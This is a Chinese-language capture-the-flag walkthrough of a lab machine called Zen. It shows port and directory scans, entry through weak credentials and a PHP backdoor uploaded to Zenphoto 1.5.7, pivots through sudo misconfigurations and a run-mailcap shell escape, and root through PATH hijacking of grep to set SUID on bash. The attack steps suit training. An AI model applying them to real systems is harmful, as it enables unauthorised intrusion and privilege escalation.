53.Zen
1. 基本信息^toc
2. 信息收集
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 192.168.56.113:22
Open 192.168.56.113:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-21 23:00 EDT
Initiating ARP Ping Scan at 23:00
Scanning 192.168.56.113 [1 port]
Completed ARP Ping Scan at 23:00, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:00
Completed Parallel DNS resolution of 1 host. at 23:00, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 23:00
Scanning 192.168.56.113 [2 ports]
Discovered open port 80/tcp on 192.168.56.113
Discovered open port 22/tcp on 192.168.56.113
Completed SYN Stealth Scan at 23:00, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.56.113
Host is up, received arp-response (0.00025s latency).
Scanned at 2025-05-21 23:00:14 EDT for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:4D:98:8E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.56.113/ -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /root/reports/http_192.168.56.113/__25-05-21_23-00-53.txt
Target: http://192.168.56.113/
[23:00:53] Starting:
[23:00:54] 200 - 599B - /.gitattributes
[23:00:54] 200 - 836B - /.gitignore
[23:00:54] 200 - 615B - /.htaccess
[23:01:00] 301 - 185B - /albums -> http://192.168.56.113/albums/
[23:01:01] 301 - 185B - /cache -> http://192.168.56.113/cache/
[23:01:01] 301 - 185B - /cache_html -> http://192.168.56.113/cache_html/
[23:01:02] 200 - 696B - /contributing.md
[23:01:04] 200 - 1KB - /favicon.ico
[23:01:07] 200 - 18KB - /LICENSE
[23:01:10] 301 - 185B - /plugins -> http://192.168.56.113/plugins/
[23:01:11] 200 - 1KB - /README.md
[23:01:11] 200 - 431B - /robots.txt
[23:01:14] 301 - 185B - /themes -> http://192.168.56.113/themes/
┌──(root㉿kali)-[~]
└─# curl http://192.168.56.113/ |grep version
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4261 0 4261 0 0 425k 0 --:--:-- --:--:-- --:--:-- 462k
<!-- zenphoto version 1.5.7 -->
2.1. zenphoto version 1.5.7 RCE
先弱口令登录
admin
P@ssw0rd
然后开这个插件
上传Php后门
http://192.168.56.113/themes/a.php
3. www-data ->user
网站根目录获取数据库账号密码
$conf['mysql_user'] = "test";
$conf['mysql_pass'] = "teste";
$conf['mysql_host'] = "localhost";
$conf['mysql_database'] = "zen";
但是数据库里面没啥有用的东西
(remote) www-data@zen:/var/www/html/zenphoto/zp-data$ ls -Rla /home
/home:
total 20
drwxr-xr-x 5 root root 4096 Jun 14 2021 .
drwxr-xr-x 18 root root 4096 Jun 14 2021 ..
drwxr-xr-x 2 hua hua 4096 Jun 14 2021 hua
drwxr-xr-x 2 kodo kodo 4096 Jun 14 2021 kodo
drwxr-xr-x 3 zenmaster zenmaster 4096 Jun 14 2021 zenmaster
/home/hua:
total 20
drwxr-xr-x 2 hua hua 4096 Jun 14 2021 .
drwxr-xr-x 5 root root 4096 Jun 14 2021 ..
-rw-r--r-- 1 hua hua 220 Jun 14 2021 .bash_logout
-rw-r--r-- 1 hua hua 3526 Jun 14 2021 .bashrc
-rw-r--r-- 1 hua hua 807 Jun 14 2021 .profile
/home/kodo:
total 24
drwxr-xr-x 2 kodo kodo 4096 Jun 14 2021 .
drwxr-xr-x 5 root root 4096 Jun 14 2021 ..
-rw------- 1 kodo kodo 49 Jun 14 2021 .Xauthority
-rw-r--r-- 1 kodo kodo 220 Jun 14 2021 .bash_logout
-rw-r--r-- 1 kodo kodo 3526 Jun 14 2021 .bashrc
-rw-r--r-- 1 kodo kodo 807 Jun 14 2021 .profile
/home/zenmaster:
total 28
drwxr-xr-x 3 zenmaster zenmaster 4096 Jun 14 2021 .
drwxr-xr-x 5 root root 4096 Jun 14 2021 ..
-rw-r--r-- 1 zenmaster zenmaster 220 Jun 14 2021 .bash_logout
-rw-r--r-- 1 zenmaster zenmaster 3526 Jun 14 2021 .bashrc
drwxr-xr-x 3 zenmaster zenmaster 4096 Jun 14 2021 .local
-rw-r--r-- 1 zenmaster zenmaster 807 Jun 14 2021 .profile
-rw------- 1 zenmaster zenmaster 9 Jun 14 2021 user.txt
/home/zenmaster/.local:
total 12
drwxr-xr-x 3 zenmaster zenmaster 4096 Jun 14 2021 .
drwxr-xr-x 3 zenmaster zenmaster 4096 Jun 14 2021 ..
drwx------ 3 zenmaster zenmaster 4096 Jun 14 2021 share
ls: cannot open directory '/home/zenmaster/.local/share': Permission denied
可以看到zenmaster 用户下有userflag,那么下一步就是走这里了
后面找了好多都没找到相关有用的信息
3.1. ssh弱口令
简单测试几个弱口令,发现密码就是用户名
hua kodo zenmaster
(remote) www-data@zen:/var/www/html/zenphoto/zp-data$ su zenmaster
Password: zenmaste
zenmaster@zen:/var/www/html/zenphoto/zp-data$
zenmaster@zen:/var/www/html/zenphoto/zp-data$ sudo -l
Matching Defaults entries for zenmaster on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zenmaster may run the following commands on zen:
(kodo) NOPASSWD: /bin/bash
4. 提权hua
kodo@zen:~$ sudo -l
Matching Defaults entries for kodo on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kodo may run the following commands on zen:
(hua) NOPASSWD: /usr/bin/see
see就是run-mailcap
hua@zen:/home$ ls -la /usr/bin/see
lrwxrwxrwx 1 root root 11 Feb 9 2019 /usr/bin/see -> run-mailcap
sudo -u hua /usr/bin/see /etc/passwd
!/bin/bash
5. 提权root
hua@zen:/home$ sudo -l
Matching Defaults entries for hua on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User hua may run the following commands on zen:
(ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen
hua@zen:/home$ cat /usr/sbin/add-shell
#!/bin/sh -e
if test $# -eq 0
then
echo usage: $0 shellname [shellname ...]
exit 1
fi
file=/etc/shells
# I want this to be GUARANTEED to be on the same filesystem as $file
tmpfile=${file}.tmp
set -o noclobber
trap "rm -f $tmpfile" EXIT
if ! awk '{print}' $file > $tmpfile
then
cat 1>&2 <<EOF
Either another instance of $0 is running, or it was previously interrupted.
Please examine ${tmpfile} to see if it should be moved onto ${file}.
EOF
exit 1
fi
for i
do
REALDIR="$(dirname $(realpath -m $i))/$(basename $i)"
for j in "$i" "$REALDIR"
do
if ! grep -q "^${j}$" $tmpfile
then
echo $j >> $tmpfile
fi
done
done
chmod --reference=$file $tmpfile
chown --reference=$file $tmpfile
mv $tmpfile $file
trap "" EXIT
exit 0
5.1. 环境变量劫持提权
上面的sh脚本里面,使用了很多系统命令,这些命令我们可以进行劫持,比如set
首先看一下这个环境变量的优先级
hua@zen:/home$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
再看看当前系统命令的优先级在哪里
hua@zen:/home$ which grep
/usr/bin/grep
是在 /usr/bin/ 里面
那我们只要在 /usr/local/sbin /usr/local/bin 或者 /usr/sbin 里面任意一个进行劫持即可
hua@zen:/home$ ls -la /usr/local/bin
total 8
drwxr-xrwx 2 root root 4096 Jun 14 2021 .
drwxr-xr-x 10 root root 4096 Jun 14 2021 ..
发现 /usr/local/bin 是可写的,
直接在这个目录下劫持即可
hua@zen:/home$ echo 'chmod +s /bin/bash' >/usr/local/bin/grep
hua@zen:/home$ sudo -l
Matching Defaults entries for hua on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User hua may run the following commands on zen:
(ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen
hua@zen:/home$ chmod +x /usr/local/bin/grep
hua@zen:/home$ su /usr/sbin/add-shell zen
su: user /usr/sbin/add-shell does not exist
hua@zen:/home$ sudo /usr/sbin/add-shell zen
hua@zen:/home$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
hua@zen:/home$ bash -p
bash-5.0# whoami
root
bash-5.0# cat /root/root.txt
hmvenlightenment